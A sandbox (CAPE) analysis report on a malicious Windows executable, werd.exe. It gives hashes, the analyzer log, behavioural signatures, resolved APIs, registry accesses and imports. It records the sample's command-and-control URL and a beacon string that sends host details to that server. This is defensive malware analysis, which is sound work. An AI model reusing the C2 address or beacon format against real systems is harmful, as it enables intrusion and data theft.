Analysis

Category: FILE
Package: exe
Started: 2018-12-04 17:35:08
Completed: 2018-12-04 17:39:03
Duration: 235 seconds
Options:
route = internet
procdump = 1
2018-12-04 17:35:15,015 [root] INFO: Date set to: 12-04-18, time set to: 17:35:15
2018-12-04 17:35:15,062 [root] DEBUG: Starting analyzer from: C:\esgppejl
2018-12-04 17:35:15,062 [root] DEBUG: Storing results at: C:\fSzqujHD
2018-12-04 17:35:15,062 [root] DEBUG: Pipe server name: \\.\PIPE\dTsePCF
2018-12-04 17:35:15,078 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2018-12-04 17:35:15,078 [root] INFO: Automatically selected analysis package "exe"
2018-12-04 17:35:16,559 [root] DEBUG: Started auxiliary module Browser
2018-12-04 17:35:16,559 [root] DEBUG: Started auxiliary module Curtain
2018-12-04 17:35:16,559 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2018-12-04 17:35:16,559 [root] DEBUG: Started auxiliary module DigiSig
2018-12-04 17:35:16,575 [root] DEBUG: Started auxiliary module Disguise
2018-12-04 17:35:16,575 [root] DEBUG: Started auxiliary module Human
2018-12-04 17:35:16,575 [root] DEBUG: Started auxiliary module Screenshots
2018-12-04 17:35:16,575 [root] DEBUG: Started auxiliary module Sysmon
2018-12-04 17:35:16,575 [root] DEBUG: Started auxiliary module Usage
2018-12-04 17:35:16,575 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2018-12-04 17:35:16,575 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2018-12-04 17:35:16,839 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\werd.exe" with arguments "" with pid 2972
2018-12-04 17:35:16,917 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2018-12-04 17:35:16,934 [lib.api.process] INFO: 32-bit DLL to inject is C:\esgppejl\dll\rOVOUYs.dll, loader C:\esgppejl\bin\SrmYGGF.exe
2018-12-04 17:35:17,028 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2972
2018-12-04 17:35:19,039 [lib.api.process] INFO: Successfully resumed process with pid 2972
2018-12-04 17:35:19,039 [root] INFO: Added new process to list with pid: 2972
2018-12-04 17:35:19,134 [root] DEBUG: Terminate processes on terminate_event disabled.
2018-12-04 17:35:19,134 [root] DEBUG: Process dumps enabled.
2018-12-04 17:35:19,196 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2972 at 0x74480000, image base 0x400000, stack from 0x186000-0x190000
2018-12-04 17:35:19,196 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\werd.exe".
2018-12-04 17:35:19,196 [root] INFO: Monitor successfully loaded in process with pid 2972.
2018-12-04 17:35:20,085 [root] INFO: Disabling sleep skipping.
2018-12-04 17:35:42,128 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2018-12-04 17:35:42,158 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2018-12-04 17:35:42,158 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2018-12-04 17:35:42,158 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2018-12-04 17:35:42,158 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2018-12-04 17:35:42,158 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2018-12-04 17:35:42,190 [root] DEBUG: DLL loaded at 0x749C0000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2018-12-04 17:35:42,190 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2018-12-04 17:35:42,190 [root] DEBUG: DLL loaded at 0x749B0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2018-12-04 17:35:42,190 [root] DEBUG: DLL loaded at 0x749A0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2018-12-04 17:35:42,206 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2018-12-04 17:35:42,206 [root] DEBUG: DLL loaded at 0x74980000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2018-12-04 17:35:42,221 [root] DEBUG: DLL loaded at 0x742E0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2018-12-04 17:35:42,267 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2018-12-04 17:35:42,267 [root] DEBUG: DLL loaded at 0x74970000: C:\Windows\system32\profapi (0xb000 bytes).
2018-12-04 17:35:42,283 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\dnsapi (0x44000 bytes).
2018-12-04 17:35:42,283 [root] DEBUG: DLL unloaded from 0x75D60000.
2018-12-04 17:35:42,299 [root] DEBUG: DLL loaded at 0x74810000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2018-12-04 17:35:42,299 [root] DEBUG: DLL loaded at 0x74950000: C:\Windows\system32\rasman (0x15000 bytes).
2018-12-04 17:35:42,299 [root] DEBUG: DLL unloaded from 0x74810000.
2018-12-04 17:35:42,315 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\system32\rtutils (0xd000 bytes).
2018-12-04 17:35:42,315 [root] DEBUG: DLL loaded at 0x74930000: C:\Windows\system32\sensapi (0x6000 bytes).
2018-12-04 17:35:42,315 [root] DEBUG: DLL unloaded from 0x75600000.
2018-12-04 17:35:42,315 [root] DEBUG: DLL unloaded from 0x74950000.
2018-12-04 17:35:42,315 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x74800000: C:\Windows\System32\wship6 (0x6000 bytes).
2018-12-04 17:35:42,331 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2018-12-04 17:35:42,345 [root] DEBUG: DLL loaded at 0x742A0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2018-12-04 17:35:42,361 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2018-12-04 17:35:42,392 [root] DEBUG: DLL loaded at 0x74240000: C:\Windows\System32\netprofm (0x5a000 bytes).
2018-12-04 17:35:42,408 [root] DEBUG: DLL loaded at 0x74C70000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2018-12-04 17:35:42,408 [root] DEBUG: DLL loaded at 0x74C30000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2018-12-04 17:35:42,408 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2018-12-04 17:35:42,424 [root] DEBUG: DLL unloaded from 0x749C0000.
2018-12-04 17:35:42,424 [root] DEBUG: DLL unloaded from 0x74980000.
2018-12-04 17:35:44,701 [root] DEBUG: DLL unloaded from 0x75600000.
2018-12-04 17:35:54,717 [root] DEBUG: DLL unloaded from 0x751B0000.
2018-12-04 17:35:54,717 [root] DEBUG: DLL unloaded from 0x74240000.
2018-12-04 17:35:54,717 [root] DEBUG: DLL unloaded from 0x75600000.
2018-12-04 17:38:40,920 [root] INFO: Analysis timeout hit, terminating analysis.
2018-12-04 17:38:40,920 [root] INFO: Created shutdown mutex.
2018-12-04 17:38:41,934 [root] INFO: Setting terminate event for process 2972.
2018-12-04 17:38:41,934 [root] DEBUG: Terminate Event: Attempting to dump process 2972
2018-12-04 17:38:41,934 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2018-12-04 17:38:41,934 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2018-12-04 17:38:41,934 [root] DEBUG: DumpProcess: Module entry point VA is 0x000015F0.
2018-12-04 17:38:41,934 [root] DEBUG: PeParser: Section 1 size too big: 0xe8000000
2018-12-04 17:38:41,934 [root] DEBUG: DumpProcess: There was a problem reading one or more sections, the dump may be incomplete.
2018-12-04 17:38:41,934 [root] DEBUG: DumpProcess: Error - Cannot dump image.
2018-12-04 17:38:42,448 [root] INFO: Shutting down package.
2018-12-04 17:38:42,448 [root] INFO: Stopping auxiliary modules.
2018-12-04 17:38:42,448 [root] INFO: Finishing auxiliary modules.
2018-12-04 17:38:42,448 [root] INFO: Shutting down pipe server and dumping dropped files.
2018-12-04 17:38:42,448 [root] INFO: Analysis completed.

MalScore

10.0

Malicious

Machine

Name Label Manager Started On Shutdown On
target-01 target-01 ESX 2018-12-04 17:35:09 2018-12-04 17:39:01

File Details

File Name werd.exe
File Size 114690 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 cea527236e09f569093fea67d8008e80
SHA1 1ca7329aa0df6b5a423adb9c4366457e1affc764
SHA256 ad783ca9c2bd4c9905b131d170c1dce5bad9de8b8c2d4607a8cd051021284df0
SHA512 e2731aa843d7e130ef7831eb603b17cb399c74a169eb9326feab6ceccdf81b971db0d7bcb1b02e599a635de255838e955e8803448bde369eee964d87473c2eee
CRC32 DD1CC66D
Ssdeep 1536:M3Clavs0DxaffdBlEQdWgVdl5atwlPaqqhKxy5+Jq0rVvixQ:M3CkvsNdBWQdJlUtwlfqX0rsK
TrID
  • 41.0% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 36.3% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 8.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 5.9% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 2.6% (.EXE) OS/2 Executable (generic) (2029/13)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

Behavioural detection: Executable code extraction
Behavioural detection: Decompression of executable module(s).
Creates RWX memory
A process attempted to delay the analysis task.
Process: werd.exe tried to sleep 1140 seconds, actually delayed analysis time by 0 seconds
Dynamic (imported) function loading detected
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: WININET.dll/HttpSendRequestA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCrackUrlA
DynamicLoader: WININET.dll/HttpOpenRequestA
DynamicLoader: WININET.dll/InternetSetOptionA
DynamicLoader: WININET.dll/InternetQueryOptionA
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetConnectA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: PSAPI.DLL/GetProcessImageFileNameA
DynamicLoader: PSAPI.DLL/EnumProcesses
DynamicLoader: ntdll.dll/RtlDecompressBuffer
DynamicLoader: kernel32.dll/GetComputerNameA
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetProcessHeap
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/GetVolumeInformationA
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/VirtualAllocEx
DynamicLoader: kernel32.dll/VirtualFreeEx
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetProcessId
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/GetThreadContext
DynamicLoader: kernel32.dll/SetThreadContext
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/GetEnvironmentVariableA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDecrypt
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptDeriveKey
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/LookupAccountSidA
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: sechost.dll/LookupAccountSidLocalA
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: dhcpcsvc.DLL/DhcpRequestParams
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptDeriveKey
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/GetNativeSystemInfo
Performs HTTP requests potentially not found in PCAP.
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
url: ninglarenlac.com:80//4/forum.php
HTTP traffic contains suspicious features which may be indicative of malware related traffic
post_no_referer: HTTP traffic contains a POST request with no referer header
suspicious_request: http://ninglarenlac.com/4/forum.php
Performs some HTTP requests
url: http://api.ipify.org/
url: http://ninglarenlac.com/4/forum.php
Looks up the external IP address
domain: api.ipify.org
A process sent information about the computer to a remote location.
Beacon: werd.exe: GUID=11855836160270601216&BUILD=03gre12&INFO=WIN7-X64-CUCKOO @ WIN7-X64-CUCKOO\user&IP=5.62.62.203&TYPE=1&WIN=6.1(x64)
Anomalous binary characteristics
anomaly: Actual checksum does not match that reported in PE header

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 23.21.121.219 [VT] United States
N 191.101.20.16 [VT] Netherlands

DNS

Name Response Post-Analysis Lookup
api.ipify.org [VT] A 23.21.121.219 [VT]
CNAME nagano-19599.herokussl.com [VT]
A 50.16.248.221 [VT]
A 50.19.229.252 [VT]
A 54.221.234.215 [VT]
A 23.23.114.123 [VT]
A 54.243.123.39 [VT]
CNAME elb097307-934924932.us-east-1.elb.amazonaws.com [VT]
ninglarenlac.com [VT] A 191.101.20.16 [VT]

Summary

C:\
C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\EnableFileTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\FileTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\EnableConsoleTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\ConsoleTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\MaxFileSize
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\FileDirectory
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\EnableFileTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\FileTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\EnableConsoleTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\ConsoleTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\MaxFileSize
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xe0\xa3\xb8\xc7\xb7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\EnableFileTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\FileTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\EnableConsoleTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\ConsoleTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\MaxFileSize
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASAPI32\FileDirectory
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\EnableFileTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\FileTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\EnableConsoleTracing
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\ConsoleTracingMask
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\MaxFileSize
\xd6\x90\xc7\xb7EY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\werd_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xe0\xa3\xb8\xc7\xb7EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
kernel32.dll.GetModuleHandleA
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualFree
kernel32.dll.OutputDebugStringA
ntdll.dll._stricmp
ntdll.dll.memset
ntdll.dll.memcpy
ntdll.dll.RtlDecompressBuffer
kernel32.dll.HeapAlloc
kernel32.dll.HeapFree
kernel32.dll.GetProcessHeap
kernel32.dll.VirtualQuery
kernel32.dll.ExitProcess
user32.dll.SetTimer
user32.dll.GetMessageA
user32.dll.TranslateMessage
user32.dll.DispatchMessageA
user32.dll.DefWindowProcA
user32.dll.RegisterClassExA
user32.dll.CreateWindowExA
wininet.dll.InternetOpenA
wininet.dll.HttpSendRequestA
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCrackUrlA
wininet.dll.HttpOpenRequestA
wininet.dll.InternetSetOptionA
wininet.dll.InternetQueryOptionA
wininet.dll.InternetReadFile
wininet.dll.InternetConnectA
wininet.dll.InternetCloseHandle
iphlpapi.dll.GetAdaptersAddresses
psapi.dll.GetProcessImageFileNameA
psapi.dll.EnumProcesses
kernel32.dll.GetComputerNameA
kernel32.dll.CreateFileA
kernel32.dll.GetTempFileNameA
kernel32.dll.GetVersion
kernel32.dll.lstrcpyA
kernel32.dll.lstrlenA
kernel32.dll.GetWindowsDirectoryA
kernel32.dll.GetVolumeInformationA
kernel32.dll.Sleep
kernel32.dll.GetProcAddress
kernel32.dll.VirtualAllocEx
kernel32.dll.VirtualFreeEx
kernel32.dll.OpenProcess
kernel32.dll.TerminateProcess
kernel32.dll.CreateThread
kernel32.dll.GetProcessId
kernel32.dll.GetLastError
kernel32.dll.WriteProcessMemory
kernel32.dll.GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.ResumeThread
kernel32.dll.WriteFile
kernel32.dll.CloseHandle
kernel32.dll.GetSystemInfo
kernel32.dll.lstrcmpiA
kernel32.dll.lstrcatA
kernel32.dll.CreateProcessA
kernel32.dll.GetEnvironmentVariableA
kernel32.dll.GetTempPathA
user32.dll.wsprintfA
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDecrypt
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptDeriveKey
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptAcquireContextA
advapi32.dll.LookupAccountSidA
advapi32.dll.GetTokenInformation
advapi32.dll.OpenProcessToken
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
sechost.dll.LookupAccountSidLocalA
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
ole32.dll.CoInitializeEx
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoCreateInstance
dhcpcsvc.dll.DhcpRequestParams
kernel32.dll.GetNativeSystemInfo
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptDeriveKey
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptReleaseContext
ole32.dll.CoUninitialize
oleaut32.dll.#500
DBWinMutex
IESQMMUTEX_0_208

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x004031a7
Reported Checksum 0x00029fa9
Actual Checksum 0x0002a9b8
Minimum OS Version 4.0
Compile Time 2018-10-01 03:26:14
Import Hash d764ef4b711af20241bc7fecaa6e63df

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x0000c7a7 0x0000d000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 5.96
.rdata 0x0000e000 0x0000132c 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 2.80
.data 0x00010000 0x0000b5a0 0x00004000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 1.04
.rsrc 0x0001c000 0x00008000 0x00008000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.00

Overlay

Offset 0x0001c000
Size 0x00000002

Imports

Library MPR.dll:
Library KERNEL32.dll:
0x40e000 DecodePointer
0x40e00c CreateFileA
0x40e010 FindVolumeClose
0x40e014 GetDriveTypeW
0x40e018 SetErrorMode
0x40e01c QueryDosDeviceA
0x40e020 WaitForSingleObject
0x40e024 SetEvent
0x40e034 WideCharToMultiByte
0x40e040 GetFileAttributesA
0x40e044 GetOverlappedResult
0x40e048 GetLastError
0x40e054 CreateEventW
0x40e068 FindFirstVolumeA
0x40e06c CloseHandle
0x40e070 FindNextVolumeA
0x40e074 CreateThread
0x40e078 HeapFree
0x40e07c HeapAlloc
0x40e080 GetCommandLineA
0x40e084 GetCommandLineW
0x40e088 HeapSetInformation
0x40e08c TerminateProcess
0x40e090 GetCurrentProcess
0x40e09c IsDebuggerPresent
0x40e0a0 GetCPInfo
0x40e0ac GetACP
0x40e0b0 GetOEMCP
0x40e0b4 IsValidCodePage
0x40e0b8 EncodePointer
0x40e0bc TlsAlloc
0x40e0c0 TlsGetValue
0x40e0c4 TlsSetValue
0x40e0c8 CreateFileW
0x40e0cc TlsFree
